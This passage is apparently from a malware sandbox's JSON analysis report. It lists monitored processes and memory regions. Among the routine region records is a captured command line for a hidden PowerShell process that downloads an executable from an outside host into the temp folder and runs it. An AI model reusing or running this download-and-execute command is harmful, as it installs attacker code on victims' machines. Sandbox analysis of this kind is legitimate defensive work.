"version": 1 }, "end_va": 80609279, "entry_point": 0, "filename": null, "id": "region_274", "name": "private_0x0000000004be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 79560704, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 80609280, "type": "region", "version": 1 }, "end_va": 97386495, "entry_point": 0, "filename": null, "id": "region_275", "name": "pagefile_0x0000000004ce0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 80609280, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 97386496, "type": "region", "version": 1 }, "end_va": 97452031, "entry_point": 0, "filename": null, "id": "region_276", "name": "private_0x0000000005ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 97386496, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 45056, "start_va": 97452032, "type": "region", "version": 1 }, "end_va": 97497087, "entry_point": 0, "filename": null, "id": "region_277", "name": "private_0x0000000005cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 97452032, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 24576, "start_va": 97517568, "type": "region", "version": 1 }, "end_va": 97542143, "entry_point": 0, "filename": null, "id": "region_278", "name": "private_0x0000000005d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 97517568, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 97583104, "type": "region", "version": 1 }, "end_va": 97587199, "entry_point": 0, "filename": null, "id": "region_279", "name": "private_0x0000000005d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 97583104, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 97648640, "type": "region", "version": 1 }, "end_va": 97652735, "entry_point": 0, "filename": null, "id": "region_280", "name": "private_0x0000000005d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 97648640, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 97714176, "type": "region", "version": 1 }, "end_va": 97718271, "entry_point": 0, "filename": null, "id": "region_281", "name": "private_0x0000000005d30000", "norm_filename": null, "region_type": "private_memory", "start_va": 97714176, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 97779712, "type": "region", "version": 1 }, "end_va": 97787903, "entry_point": 0, "filename": null, "id": "region_282", "name": "private_0x0000000005d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 97779712, "timestamp": "00:00:10.375", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden $nJThd = new-object System.Net.WebClient;$kNpOYqxzAkL = new-object random;$str = 'http://test.top/admin.php?f=2 ,http://test.top/admin.php?f=2 ' -replace 'test', 'weekendfakc'; $kCeRq = $str.Split(',');$name = $kNpOYqxzAkL.next(1, 65536);$CQxUPWselP = $env:temp + '' + $name + '.exe';foreach($dOpZTR in $kCeRq){try{$nJThd.DownloadFile($dOpZTR.ToString(), $CQxUPWselP);Start-Process $CQxUPWselP;break;}catch{write-host $_.Exception.Message;}}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_2", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000574-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_636", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_574", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:41.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_575", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:41.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_576", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:41.031", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000577-addr_0x0000000000090000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_637", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_577", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:41.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004549632, "type": "region", "version": 1 }, "end_va": 2006290431, "entry_point": 2004549632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_578", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004549632, "timestamp": "00:01:41.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_579", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:41.032", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000580-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_638", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_580", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:41.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5352456192, "type": "region", "version": 1 }, "end_va": 5352943615, "entry_point": 5352456192, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_581", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5352456192, "timestamp": "00:01:41.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792615424, "type": "region", "version": 1 }, "end_va": 8791792619519, "entry_point": 8791792615424, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_582", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792615424, "timestamp": "00:01:41.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_583", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:41.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000584-addr_0x000007fffffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_639", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092841983, "entry_point": 0, "filename": null, "id": "region_584", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:41.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000585-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_640", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_585", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:41.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000586-addr_0x0000000000160000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_641", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_586", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:41.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003369984, "type": "region", "version": 1 }, "end_va": 2004545535, "entry_point": 2003459744, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_587", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003369984, "timestamp": "00:01:41.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791756308480, "type": "region", "version": 1 }, "end_va": 8791756746751, "entry_point": 8791756320992, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_588", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791756308480, "timestamp": "00:01:41.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_589", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:41.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_590", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:41.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2912255, "entry_point": 2490368, "filename": "\\Windows\\System32\\locale.nls", "id": "region_591", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:01:41.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002321408, "type": "region", "version": 1 }, "end_va": 2003345407, "entry_point": 2002428616, "filename": "\\Windows\\System32\\user32.dll", "id": "region_592", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002321408, "timestamp": "00:01:41.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_593", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:41.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_594", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:41.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791592140800, "type": "region", "version": 1 }, "end_va": 8791592595455, "entry_point": 8791592145204, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_595", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791592140800, "timestamp": "00:01:41.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791718494208, "type": "region", "version": 1 }, "end_va": 8791718596607, "entry_point": 8791718494208, "filename": "\\Windows\\System32\\atl.dll", "id": "region_596", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791718494208, "timestamp": "00:01:41.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791760896000, "type": "region", "version": 1 }, "end_va": 8791761776639, "entry_point": 8791760908916, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_597", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791760896000, "timestamp": "00:01:41.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791761813504, "type": "region", "version": 1 }, "end_va": 8791762276351, "entry_point": 8791761886752, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_598", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791761813504, "timestamp": "00:01:41.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791763714048, "type": "region", "version": 1 }, "end_va": 8791764365311, "entry_point": 8791763723680, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_599", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791763714048, "timestamp": "00:01:41.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791764369408, "type": "region", "version": 1 }, "end_va": 8791764791295, "entry_point": 8791764414524, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_600", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791764369408, "timestamp": "00:01:41.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791767318528, "type": "region", "version": 1 }, "end_va": 8791768215551, "entry_point": 8791767451488, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_601", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791767318528, "timestamp": "00:01:41.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791770005504, "type": "region", "version": 1 }, "end_va": 8791770828799, "entry_point": 8791770507380, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_602", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791770005504, "timestamp": "00:01:41.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791770857472, "type": "region", "version": 1 }, "end_va": 8791772966911, "entry_point": 8791771001648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_603", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791770857472, "timestamp": "00:01:41.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791789535232, "type": "region", "version": 1 }, "end_va": 8791789662207, "entry_point": 8791789560040, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_604", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791789535232, "timestamp": "00:01:41.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791789666304, "type": "region", "version": 1 }, "end_va": 8791790899199, "entry_point": 8791789989200, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_605", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791789666304, "timestamp": "00:01:41.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791792484352, "type": "region", "version": 1 }, "end_va": 8791792541695, "entry_point": 8791792488576, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_606", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791792484352, "timestamp": "00:01:41.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_607", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:41.364", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000608-addr_0x0000000000060000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_642", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 458751, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:01:41.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_609", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:41.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 536575, "entry_point": 524288, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_610", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:41.365", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000611-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_643", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_611", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:41.371", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000612-addr_0x0000000000120000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_644", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_612", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:01:41.371", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000613-addr_0x00000000002d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_645", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_613", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:41.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 5603327, "entry_point": 0, "filename": null, "id": "region_614", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:41.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 7213055, "entry_point": 0, "filename": null, "id": "region_615", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:01:41.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 28246015, "entry_point": 0, "filename": null, "id": "region_616", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:01:41.372", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000617-addr_0x0000000001af0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_646", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28246016, "type": "region", "version": 1 }, "end_va": 29294591, "entry_point": 0, "filename": null, "id": "region_617", "name": "private_0x0000000001af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28246016, "timestamp": "00:01:41.373", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000618-addr_0x0000000001ca0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_647", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30081023, "entry_point": 0, "filename": null, "id": "region_618", "name": "private_0x0000000001ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30015488, "timestamp": "00:01:41.373", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000619-addr_0x0000000001e30000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_648", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_619", "name": "private_0x0000000001e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 31653888, "timestamp": "00:01:41.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791753949184, "type": "region", "version": 1 }, "end_va": 8791754010623, "entry_point": 8791753953296, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_620", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791753949184, "timestamp": "00:01:41.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791759060992, "type": "region", "version": 1 }, "end_va": 8791760146431, "entry_point": 8791759065188, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_621", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791759060992, 